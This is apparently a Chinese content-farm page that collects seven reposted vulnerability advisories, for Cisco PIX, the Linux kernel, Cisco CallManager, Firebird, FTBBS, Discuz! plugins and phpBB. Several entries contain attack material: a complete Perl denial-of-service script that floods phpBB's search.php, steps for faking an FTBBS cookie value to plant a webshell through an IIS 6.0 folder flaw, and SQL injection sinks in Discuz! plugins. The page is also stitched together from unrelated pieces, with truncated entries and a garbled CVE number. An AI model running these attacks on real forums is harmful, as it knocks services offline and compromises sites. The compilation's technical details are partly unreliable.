欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞

Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞

2023-06-02 08:14:57 收藏本文 下载本文

“不吐不快”通过精心收集,向本站投稿了7篇Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞,以下是小编帮大家整理后的Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞,仅供参考,欢迎大家阅读。

Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞

篇1:Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞

受影响系统:

Cisco PIX Firewall 7.0Cisco PIX Firewall 6.3

详细描述:

Cisco PIX是一款硬件防火墙解决方案,

Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞

Cisco PIX在处理畸形的TCP报文时存在漏洞,远程攻击者可能利用此漏洞对合法源访问进行拒绝服务攻击。如果通过PIX防火墙发送了有错误校验和的TCP SYN报文的话,PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接,直到30秒后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文,将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文,就无法同恶意报文中所指定的凭据建立新的TCP会话,默认时间为7.0版为30秒,6.3版为2分2秒,之后会恢复正常运行。

篇2:Linux Kernel畸形ULE报文处理远程拒绝服务漏洞

受影响系统:Linux kernel 2.6.x <= 2.6.17.7不受影响系统:Linux kernel 2.6.17.8描述:

BUGTRAQ  ID: 19939

CVE(CAN) ID: CVE--4623

Linux Kernel是开放源码操作系统Linux所使用的内核,

Linux的ULE(单向轻型封装RFC 4326)拆封代码存在一个漏洞,远程攻击者可能利用此漏洞对接收处理的服务器造成拒绝服务攻击。

攻击者可以通过发送SNDU长度为0的ULE报文导致漏洞的触发。

<*来源:Ang Way Chuang (wcang@nrg.cs.usm.my)

链接:lkml.org/lkml/2006/8/20/278

*>

建议:

厂商补丁:

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.kernel.org/

diff -uprN linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c

--- linux-2.6.17.8/drivers/media/dvb/dvb-core/dvb_net.c 2006-08-07 12:18:54.000000000 +0800

+++ linux-2.6.17.8-fix/drivers/media/dvb/dvb-core/dvb_net.c    2006-08-21 11:09:12.000000000 +0800

@@ -492,7 +492,7 @@ static void dvb_net_ule( struct net_devi

} else

priv->ule_dbit = 0;

-                              if (priv->ule_sndu_len >32763) {

+                              if (priv->ule_sndu_len >32763 || priv->ule_sndu_len < ((priv->ule_dbit) ? 4 : 4 + ETH_ALEN)) {

printk(KERN_WARNING “%lu: Invalid ULE SNDU length %u. ”

“Resyncing.\n”, priv->ts_count, priv->ule_sndu_len);

priv->ule_sndu_len = 0;

篇3:Cisco CallManager拒绝服务漏洞

成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启,

详细描述:

Cisco CallManager(CCM)是Cisco IP电话解决方案的基于软件的呼叫处理组件。 P

一些CCM版本没有主动管理TCP连接和Windows消息,导致一些公开的发布端口受拒绝服务攻击影响:

1 CCM没有足够主动的超时到端口的TCP连接,导致足够多的开放连接会耗尽内存和CPU资源。在特定的情况下,CCM会无限期的保持TCP连接开放,直到重启CCM服务或重启服务器。

2 多个到、或7727端口的连接会充满Windows消息队列,导致CCM无法处理Windows Service Manager,在30秒超时后重启CCM,

成功利用这些漏洞会导致拒绝服务攻击,造成高CPU使用率、中断服务或重启服务器,然后可能导致电话无法响应、从CCM注销电话或CCM重启。

受影响系统:

Cisco Call Manager = 3.2

Cisco Call Manager 4.1

Cisco Call Manager 4.0

Cisco Call Manager 3.3

补丁下载:

Cisco

-----

Cisco已经为此发布了一个安全公告(cisco-sa-20060118-ccmdos)以及相应补丁:

cisco-sa-20060118-ccmdos:Cisco Call Manager Denial of Service

链接:www.cisco.com/warp/public/707/cisco-sa-20060118-ccmdos.shtml

篇4:请求远程拒绝服务漏洞

/* CSS Document */

Firebird是一款提供多个ANSI SQL-92功能的关系型数据库,可运行在Linux、Windows和各种Unix平台下,

在Firebird的src/remote/server.cpp文件中,process_packet2函数负责处理从客户端发送过来的报文。这个函数有一个switch语句考虑协议中所定义的所有可能的opcode。

/-----------

src/remote/server.cpp:

...

3404   P_OP p = receive->p_operation;

3405   switch (op)

3406   {

3407   case op_connect:

...

3426   case op_compile:

...

3430   case op_attach:

...

- -----------/

在op_connect_request报文的情况下,执行流进入switch语句的以下case:

/-----------

src/remote/server.cpp:

...

3584   case op_connect_request:

3585       aux_request(port, &receive->p_req, sendL);

3586       break;

- -----------/

在调用aux_request()函数并执行break语句后,执行流到达:

/-----------

src/remote/server.cpp:

...

3652   if (port && port->port_state == state_broken) {

3653       if (!port->port_parent) {

3654           gds__log(“SERVER/process_packet: broken port, server exiting”);

3655           port->disconnect(sendL, receive);

3656           ThreadData::restoreSpecific();

3657           return false;

3658       }

3659       port->disconnect(sendL, receive);

3660       port = NULL;

3661   }

- -----------/

通过在接收到op_connect_request报文时调试fbserver.exe二进制程序可以看出满足了第一个if语句的条件,但没有满足第二个if的条件,因此执行流到达port->disconnect()调用:

/-----------

005ACE2C |> 837E 0C 03          CMP DWORD PTR DS:[ESI+C],3

;port->port_state == state_broken ?

005ACE30 |. 75 1B               JNZ SHORT fbserver.005ACE4D

005ACE32 |. 837E 1C 00          CMP DWORD PTR DS:[ESI+1C],0

;port->port_parent == 0?

005ACE36 |. 75 0A               JNZ SHORT fbserver.005ACE42

;this conditional jump is taken

005ACE38 |. 68 D4D65F00         PUSH fbserver.005FD6D4

; ASCII “SERVER/process_packet: broken port, server exiting”

005ACE3D |.^ E9 44FDFFFF         JMP fbserver.005ACB86

005ACE42 |> 53                  PUSH EBX

; /Arg2

005ACE43 |. 57                  PUSH EDI

; |Arg1

005ACE44 |. 8BCE                MOV ECX,ESI

; |

005ACE46 |. E8 65D7FFFF         CALL

; /port->disconnect(sendL, receive)

- -----------/

根据src/remote/remote.h中的定义,port的类型为struct rem_port,

这种结构类型在src/remote/server.cpp中实现了disconnect()函数:

/-----------

src/remote/server.cpp:

1464   void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)

- -----------/

在这个函数中执行以下代码以释放发送和接收的报文并关闭相关的套接字:

/-----------

src/remote/server.cpp:

[1] [2] 下一页

篇5:FTBBS ASP 7.0 上传漏洞漏洞预警

< %

userid=getcookie(“clubuser_id”)

............

if Application(“FTBBSMB”)(7,0)=“M” then

inFolder=year(date())&month(date())

else

inFolder=year(date())&month(date())&day(date())

end if

call makefolder(inFolder,fso)

myFolder = inFolder&“/”&userid

call makefolder(myFolder,fso)

...................

formPath=inFolder&“/”&userid

......上传过程省略.....

建立的文件夹读取的COOKIE里的userid

修改COOKLIE里userid的值为fuck.asp形式即可建立IIS 6.0缺陷文件夹导致可以上传JPG的小马

至于修改COOKIE各位大大应该都会吧~FTBBS貌似所有版本都有此问题吧~

篇6:Discuz! 7.0 若干插件漏洞分析

Discuz!是国内第一大论坛,在经历了多年的风风雨雨后,安全可以说也是数一数二了,不过我发现,越来越多的非Discuz!官方提供的插件存在安全漏洞,如果不及时修复,可能会影响整个站点的安全。

1.【DST】社区竞拍中心 V1.0 GBK For Discuz!7.0 注入:

DST的一个竞拍插件,官方地址:www.17dst.com/thread-409-1-1.html

好了看源码:

程序代码

//sql未初始化

if($ob=='my'){

$sql=“ and a.uid='$discuz_uid'”;

}

if($list!='race'){

if($list){

$navigation.=“ » $auction_lang[once_goods]”;

//这里带进来查询

$count=$db->result($db->query(“select count(*) from {$tablepre}auctions a where gmode='1' $sql”),0);

......

}

2.竞拍中心3.0 [ + SD01] -- 柒瑞精品discuz6/7商业插件 注入:

柒瑞出品的一个商业插件,收费的,DZ官方的链接:www.discuz.net/thread-139-1-1.html

这个插件我百度了下,没找到源码,不过随便测试了一下:

3.[DST]团队展示Flash1.0版本插件 注入:

DST出的一个团队展示插件,官方链接:www.17dst.com/thread-142-1-1.html

这个有源码,看一下:

.....

//这里

$query = $db->query(“Select * FROM `{$tablepre}members` Where `groupid` =$agid ”);

if ($db->num_rows($query) >0) {

......

}

漏洞太明显了,不多说了,测试了一下官方,49个字段

4.某一个帐号发放系统 注入

5.社区茶坊 for DZ7.0(带后台聊天室) XSS:

DZ官方的地址:

6.很多插件写cache的地方太大意了,可能导致意想不到的问题,正如某婚恋插件,管理员权限下可以轻松拿shell的,这个就不多说了,

DZ的插件很多,没时间细看,最近维护自己的一个论坛时无意中遇到就检测下,还是希望各位作者有点安全意识~

本文来源于:乐乐的博客 www.smilele.cn/ , 原文地址:www.smilele.cn/lele/Discuz7.html

篇7:phpBB远程拒绝服务漏洞漏洞预警

phpBB远程拒绝服务漏洞

漏洞版本:

phpBB phpBB 3.0.8

phpBB phpBB 3.0.7

phpBB phpBB 3.0.6

phpBB phpBB 3.0.5

phpBB phpBB 3.0.4

phpBB phpBB 3.0.3

phpBB phpBB 3.0.2

phpBB phpBB 3.0.1

phpBB phpBB 3.0

phpBB phpBB 2.0.21

phpBB phpBB 2.0.19

phpBB phpBB 2.0.17

phpBB phpBB 2.0.16

phpBB phpBB 2.0.15

phpBB phpBB 2.0.14

phpBB phpBB 2.0.13

phpBB phpBB 2.0.12

phpBB phpBB 2.0.11

phpBB phpBB 2.0.10

phpBB phpBB 2.0.9

phpBB phpBB 2.0.7

phpBB phpBB 2.0.6

phpBB phpBB 2.0.5

phpBB phpBB 2.0.4

phpBB phpBB 2.0.3

phpBB phpBB 2.0.2

phpBB phpBB 2.0.1

phpBB phpBB 1.4.4

phpBB phpBB 1.4.2

phpBB phpBB 1.4.1

phpBB phpBB 1.2.1

phpBB phpBB 2.0.22

phpBB phpBB 2.0.20

phpBB phpBB 2.0.18

漏洞描述:

Bugtraq ID:65481

phpBB是phpBB组开发的一套开源的使用PHP语言开发的Web论坛软件,该软件具有支持多国语言、支持多种数据库和自定义版面设计等特点。

phpBB中存在远程拒绝服务漏洞。攻击者可利用该漏洞造成受影响应用程序崩溃,拒绝服务合法用户。

<* 参考

www.securityfocus.com/bid/65481

sebug.net/appdir/phpBB

*>

测试方法:

@Sebug.net dis

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

###########################

# Phpbb Forum Denial of Service Vulnerability

###########################

#!/usr/bin/perl

# Iranian Exploit DataBase

# Phpbb Forum Denial of Service Vulnerability

# Version: All Version

# Vendor site : www.phpbb.com

# Code Written By Amir – iedb.team@gmail.com – o0_iedb_0o@yahoo.com

# Site : Www.IeDb.Ir – Www.IrIsT.Ir

# Fb Page :

www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538

# Greats : TaK.FaNaR – ErfanMs – Medrik – F@riD – Bl4ck M4n – 0x0ptim0us

- 0Day – Dj.TiniVini – E2MA3N

# l4tr0d3ctism – H-SK33PY – Noter – r3d_s0urc3 – Dr_Evil And All

Members In IeDb.Ir/acc

#####################################

use Socket;

if (@ARGV < 2) { &usage }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<10; $i–)

{

$data =

“securitytoken=guest&do=process&query=%DB%8C%D8%B3%D8%A8%D9%84%D8%B3%DB%8C%D9%84%D8%B3%DB%8C%D8%A8%D9%84%0%0%0%0%0%0%0%0%0%0&submit.x=0&submit.y=0″;

$len = length $data;

$foo = “POST “.$dir.”search.php?do=process HTTP/1.1\r\n”.

“Accept: * /*\r\n”.

“Accept-Language: en-gb\r\n”.

“Content-Type: application/x-www-form-urlencoded\r\n”.

“Accept-Encoding: gzip, deflate\r\n”.

“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n”.

“Host: $host\r\n”.

“Content-Length: $len\r\n”.

“Connection: Keep-Alive\r\n”.

“Cache-Control: no-cache\r\n\r\n”.

“$data”;

my $port = “80″;

my $proto = getprotobyname(‘tcp’);

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,”$foo”, 0);

syswrite STDOUT, “+” ;

}

print “\n\n”;

system(‘ping $host’);

sub usage {

print “\n”;

print “################################################# \n”;

print “## Phpbb Forum Denial of Service Vulnerability\n”;

print “## Discoverd By Amir – iedb.team@gmail.com – Id : o0_iedb_0o \n”;

print “## Www.IeDb.Ir – Www.IrIsT.Ir \n”;

print “################################################# \n”;

print “## [host] [path] \n”;

print “## host.com /forum/\n”;

print “################################################# \n”;

print “\n”;

exit();

};

#####################################

# Archive Exploit = www.iedb.ir/exploits-868.html

#####################################

###########################

# Iranian Exploit DataBase = IeDb.Ir [2013-11-17]

###########################

安全建议:

目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.phpbb.com/

【Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞】相关文章:

1.Uread阅读器拒绝服务漏洞的分析与解决

2.凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用

下载word文档
《Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

Cisco PIX 6.3/7.0欺骗TCP SYN报文拒绝服务漏洞相关文章
最新推荐
猜你喜欢
  • 返回顶部